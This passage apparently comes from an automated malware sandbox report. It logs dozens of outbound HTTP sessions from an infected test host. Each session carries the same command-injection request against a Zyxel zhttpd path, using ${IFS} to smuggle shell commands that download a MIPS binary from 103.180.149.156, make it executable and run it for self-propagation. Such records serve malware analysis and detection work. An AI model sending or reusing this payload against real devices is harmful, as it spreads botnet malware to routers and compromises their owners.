                                                      Feb 2, 2024 06:35:53.634062052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4524192.168.2.1447382166.89.145.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634109974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4525192.168.2.145940252.201.57.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634146929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4526192.168.2.145382894.194.11.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634170055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4527192.168.2.144408499.187.41.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634216070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4528192.168.2.145171024.94.206.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634249926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4529192.168.2.1460092106.22.89.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634284019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4530192.168.2.1440586141.183.233.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634322882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4531192.168.2.143606290.155.15.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634376049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4532192.168.2.1441828188.29.221.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634412050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4533192.168.2.1443796147.221.209.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634432077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4534192.168.2.1442832131.233.138.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634474993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4535192.168.2.1436842217.32.78.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634514093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4536192.168.2.144221264.9.246.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634541988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4537192.168.2.1451584134.195.137.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634596109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4538192.168.2.144711644.22.136.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634649038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4539192.168.2.145702442.226.185.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634677887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4540192.168.2.1436108175.183.27.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634726048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4541192.168.2.1443404112.149.237.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634754896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4542192.168.2.1443674181.93.252.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634804964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4543192.168.2.144057086.208.234.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634845018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4544192.168.2.1452368140.61.83.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634890079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4545192.168.2.144427454.247.86.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634931087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4546192.168.2.143991897.208.75.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634954929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4547192.168.2.1436580109.242.53.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634999990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4548192.168.2.145995437.147.145.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635016918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4549192.168.2.145998640.87.195.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635050058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4550192.168.2.1449874206.125.206.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635099888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4551192.168.2.1434032149.171.216.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635149956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4552192.168.2.145716437.109.4.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635164976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4553192.168.2.1460912161.52.169.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635196924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4554192.168.2.1455750159.147.38.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635240078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4555192.168.2.1455522164.121.109.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635261059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4556192.168.2.144647457.18.181.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635296106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4557192.168.2.1446888167.53.32.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635329962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4558192.168.2.1457358194.221.227.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635374069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4559192.168.2.1435562111.0.29.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635416985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4560192.168.2.143775044.5.75.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635453939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4561192.168.2.1438708204.163.39.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635502100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4562192.168.2.1455150223.1.67.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635533094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4563192.168.2.1440676138.184.98.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635576010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4564192.168.2.1460648206.189.179.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635605097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4565192.168.2.1433796140.83.66.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635656118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4566192.168.2.14481964.94.52.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635687113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4567192.168.2.143539248.71.201.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635736942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4568192.168.2.1447610183.208.225.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635771990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4569192.168.2.1441036153.35.53.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635812998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4570192.168.2.1444056123.27.251.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635848999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4571192.168.2.1436788191.185.212.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635876894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4572192.168.2.144018252.113.169.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635916948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4573192.168.2.1444210180.47.238.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635934114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4574192.168.2.144467653.110.191.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.635987997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4575192.168.2.1444470175.3.207.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636038065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4576192.168.2.1437354102.13.5.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636064053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4577192.168.2.14514362.221.197.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636085987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4578192.168.2.1445946157.33.17.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636153936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4579192.168.2.144870468.108.79.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636169910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4580192.168.2.1449886116.123.235.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636226892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4581192.168.2.1443888217.47.148.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636253119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4582192.168.2.1453478123.71.160.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636276960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4583192.168.2.144263697.51.183.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636322975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4584192.168.2.1434654178.20.113.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636347055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4585192.168.2.145832018.217.184.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636385918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4586192.168.2.143370040.120.135.117443
                                                      TimestampBytes transferredDirectionData
